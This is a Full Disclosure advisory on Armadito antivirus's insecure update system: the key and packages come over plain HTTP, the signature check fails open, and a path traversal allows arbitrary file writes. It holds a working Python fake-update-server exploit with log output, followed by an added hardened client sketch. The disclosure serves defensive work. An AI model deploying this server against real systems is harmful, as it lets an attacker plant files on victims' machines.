[FD] Armadito remote arbitrary file write in case of MiTM
- To: Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
- From: <thedeadcow@xxxxxxxxxxxx>
- Date: Mon, 27 Jun 2016 18:33:15 +0100 (BST)
Armadito (https://github.com/armadito) is a cross-platform open-source
antivirus that was originally the DAVFI project, financed through a French
government program.
As a security product supposed to protect computers against malware, its
update system fails at multiple points:
* the public key used to check update packages is retrieved over plain HTTP.
The same goes for the packages themselves.
* if Armadito can't download this public key, a bug makes it consider any
file it checks as valid (you don't even need to forge a signature)
* a vulnerability as old as General de Gaulle (path traversal) then allows
a controlled URL to be downloaded to an arbitrary path
All this allows someone in control of DNS answers, or more generally in a MiTM
position, to write arbitrary files when the update process is performed. It
also allows the vendor to do it if they want (but db.armadito.org does not
seem to work at the time of writing this email). A simple Python HTTP server
is attached to this mail as a proof-of-concept.
This happens in the ArmaditoSvc tool when run with the "--updatedb" flag. The
documentation doesn't specify whether this should run as an administrator or not.
Here is an example of the output of this tool when a potential MiTM is
performed:
===========
C:\tmp\armadito>type ..\cow.txt
File specified not found.
C:\tmp\armadito>ArmaditoSvc.exe --updatedb
---------------------------------
----- Armadito Scan service -----
---------------------------------
[+] Debug :: UpdateModulesDB :: description file downloaded successfully!
[+] Debug :: UpdateModulesDB :: signature file downloaded successfully!
armadito[4624]: <error> [-] Error :: download_pub_key ::
URLDownloadToCacheFileA failed :: error = 0x800c0006
armadito[4624]: <error> [-] Error :: verify_file_signature :: Can't download
public key from armadito server!
armadito[4624]: <error> [-] Error :: verify_file_signature :: Crypt Destroy
Key failed! :: GLE = 0x57
[+] Debug :: UpdateModulesDB :: File Signature verified successfully !
[-] Error :: GetFileContent :: Opening the file failed! :: error = 3
[+] Debug :: DownloadPackageFiles :: Downloading file from ::
http://127.0.0.1/cow....
[+] Debug :: DownloadPackageFiles :: cache filename =
XX\AppData\Local\Microsoft\Windows\INetCache\IE\3YTFPC0U\cow[1].htm
[+] Debug :: ConvertBytesToChar :: string = 4dc9a4320e79db56894c037f27d5dc0a
[+] Debug :: DownloadPackageFiles :: checksum =
4dc9a4320e79db56894c037f27d5dc0a
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first
[+] Debug :: UpdateModulesDB :: Armadito service suspended successfully!
[+] Debug :: get_db_module_path :: completePath =
C:\tmp\armadito\modules\DB\..\..\..\..\..\..\..\..\..\..\..\tmp\cow.txt
Conf_file = C:\tmp\armadito\conf\armadito.conf
[+] Debug :: init_configuration :: conf file = C:\tmp\armadito\conf\armadito.conf
armadito[4624]: <warning> cannot open conf file
C:\tmp\armadito\conf\armadito.conf
[+] Debug :: Configuration loaded successfully!
[+] Debug :: Armadito structure loaded successfully!
armadito[4624]: <error> [-] Error :: FilterConnectCommunicationPort() failed
:: errcode = 0x80070002
armadito[4624]: <error> Scan Thread initialization failed!
armadito[4624]: <error> Service loaded with errors during pause.
[+] Debug :: UpdateModulesDB :: Armadito service resumed successfully!
armadito[4624]: <error> [-] Error :: SaveHashInCacheFile :: Creating the
cache file failed! :: error = 3
[+] Debug :: UpdateModulesDB :: Modules Database updated successfully!
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first
C:\tmp\armadito>type ..\cow.txt
put_your_dead_cow_here
==============
This is an irresponsible disclosure due to irresponsible spending of the
French people's money.
The Dead Cow.
from bottle import route, run, abort
import hashlib

# Address the fake update server listens on; the victim must resolve
# db.armadito.org to this host (DNS control or any other MiTM position).
IP = '127.0.0.1'
# Content that ends up in the arbitrary file on the victim.
file_data = 'put_your_dead_cow_here'


def md5(d):
    # Armadito compares the downloaded package against the MD5 given in the
    # description ("controlType": "MD5"); hashlib needs bytes on Python 3.
    m = hashlib.md5()
    m.update(d.encode())
    return m.hexdigest()


@route('/current/armaditodbvirus.json')
def get_db():
    # Package description. 'licence' is joined to modules\DB as a
    # subdirectory, so a chain of '..\' puts displayName at an arbitrary path.
    db = {'packageList':
          [{'displayName': 'cow.txt',
            'fileUrl': 'http://%s/cow' % IP,
            'controlSum': md5(file_data),
            'controlType': 'MD5',
            'licence': '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\tmp'
            }]}
    return db  # bottle serialises a dict as JSON


@route('/current/armaditodbvirus.json.sig')
def get_db_sig():
    # Because lol bis: any bytes do, the check passes once the key is missing
    return "signature checking is so overrated"


@route('/keys/a6o_rsa_pub.pem')
def get_pub_key():
    # Because lol: a 404 makes download_pub_key fail, and Armadito then
    # reports the file as verified anyway
    abort(404, "public key cryptography is so overrated")


@route('/cow')
def get_cow():
    return file_data


# Port 80 because the client hard-codes plain HTTP (binding needs root/admin).
run(host=IP, port=80, debug=True)
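The script above is the attacker's side. As an added example, not part of the original post and not Armadito's code, the following Python sketches the client-side update logic the three bullet points at the top call for: a verification key pinned in the program instead of fetched over HTTP, a signature check that fails closed when the key or the signature is missing, HTTPS-only package URLs, and a destination-path check that refuses the "..\" chain carried in the "licence" field. The product's RSA signature is stood in for by HMAC-SHA256 so it runs on the standard library alone; the key value, the install path /opt/armadito/modules/DB, and the "signatures.db" entry with its updates.example URL are constructed for the example, while MALICIOUS mirrors the description served by the PoC.

```python
"""Hardened counterpart of the update flow the advisory describes (added
example, not Armadito's code).  The product's RSA signature is replaced by an
HMAC-SHA256 stand-in so this runs on the standard library alone; the point is
the control flow around each check, not the primitive."""
import hashlib
import hmac
import json
import os


class UpdateError(Exception):
    """Any failure aborts the update; nothing falls through to 'verified'."""


# 1. The verification key is pinned in the program, never fetched over HTTP.
#    Constructed value; a real build embeds the vendor key and ships it with the binary.
PINNED_KEY = bytes.fromhex("0123456789abcdef" * 4)

def verify_description_vulnerable(desc, sig, key):
    # The behaviour in the advisory's log: key download fails, yet "verified".
    if key is None:
        return True                                      # fail-open
    return hmac.compare_digest(hmac.new(key, desc, hashlib.sha256).digest(), sig)

def verify_description(desc, sig, key=PINNED_KEY):
    """Fail closed: a missing key or a mismatch both raise."""
    if not key:
        raise UpdateError("no pinned key; refusing to trust the description")
    expected = hmac.new(key, desc, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        raise UpdateError("description signature mismatch")

def safe_package_path(db_dir, licence, display_name):
    """2. Join db_dir/licence/display_name and refuse it if the normalised
    result leaves db_dir.  Backslashes are mapped to '/' so the Windows-style
    '..\\..\\tmp' chain from the PoC is caught on any host."""
    base = os.path.abspath(db_dir)
    parts = [p.replace("\\", "/") for p in (licence, display_name)]
    target = os.path.abspath(os.path.join(base, *parts))
    if target == base or os.path.commonpath([base, target]) != base:
        raise UpdateError("package path escapes modules directory: " + target)
    return target

def checksum_ok(data, control_sum, control_type):
    """3. Compare the download with the checksum from the verified description."""
    try:
        digest = hashlib.new(control_type.lower(), data).hexdigest()
    except ValueError:                                   # unknown controlType
        return False
    return hmac.compare_digest(digest, control_sum.lower())

def plan_update(desc, sig, db_dir, fetch, key=PINNED_KEY):
    """Verify the description, then return [(url, destination, data)] for each
    package.  fetch(url) -> bytes is injected so the example runs offline."""
    verify_description(desc, sig, key)
    plan = []
    for entry in json.loads(desc.decode("utf-8"))["packageList"]:
        dest = safe_package_path(db_dir, entry.get("licence", ""), entry["displayName"])
        url = entry["fileUrl"]
        if not url.startswith("https://"):             # no plain-HTTP packages
            raise UpdateError("refusing plain-HTTP package URL: " + url)
        data = fetch(url)
        if not checksum_ok(data, entry["controlSum"], entry["controlType"]):
            raise UpdateError("checksum mismatch for " + entry["displayName"])
        plan.append((url, dest, data))
    return plan

def try_update(desc, sig, db_dir, fetch, key=PINNED_KEY):
    # ('ok', plan) or ('refused', reason); convenient for callers and tests.
    try:
        return "ok", plan_update(desc, sig, db_dir, fetch, key)
    except UpdateError as exc:
        return "refused", str(exc)

def sign(desc, key=PINNED_KEY):
    """Vendor-side counterpart of verify_description (HMAC stand-in)."""
    return hmac.new(key, desc, hashlib.sha256).digest()


# Constructed inputs: MALICIOUS mirrors the description served by the PoC
# above; BENIGN is a hypothetical legitimate entry; DB_DIR is hypothetical.
DB_DIR = "/opt/armadito/modules/DB"
PAYLOAD = b"put_your_dead_cow_here"
MALICIOUS = json.dumps({"packageList": [{
    "displayName": "cow.txt", "fileUrl": "http://127.0.0.1/cow",
    "controlSum": hashlib.md5(PAYLOAD).hexdigest(), "controlType": "MD5",
    "licence": "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\tmp"}]}).encode()
BENIGN = json.dumps({"packageList": [{
    "displayName": "signatures.db",
    "fileUrl": "https://updates.example/current/signatures.db",
    "controlSum": hashlib.sha256(PAYLOAD).hexdigest(), "controlType": "SHA256",
    "licence": "current"}]}).encode()
HTTP_ONLY = BENIGN.replace(b"https://", b"http://")      # signed, but plain HTTP

if __name__ == "__main__":
    fetch = lambda url: PAYLOAD                          # offline download stub
    print(verify_description_vulnerable(MALICIOUS, b"junk", None))   # True
    print(try_update(MALICIOUS, b"signature checking is so overrated", DB_DIR, fetch))
    print(try_update(MALICIOUS, sign(MALICIOUS), DB_DIR, fetch))
    print(try_update(BENIGN, sign(BENIGN), DB_DIR, fetch))
```

Note the ordering: even a correctly signed description is still refused if an entry's path escapes the modules directory, so a compromised or mistaken vendor key does not turn the updater back into an arbitrary file write.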
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/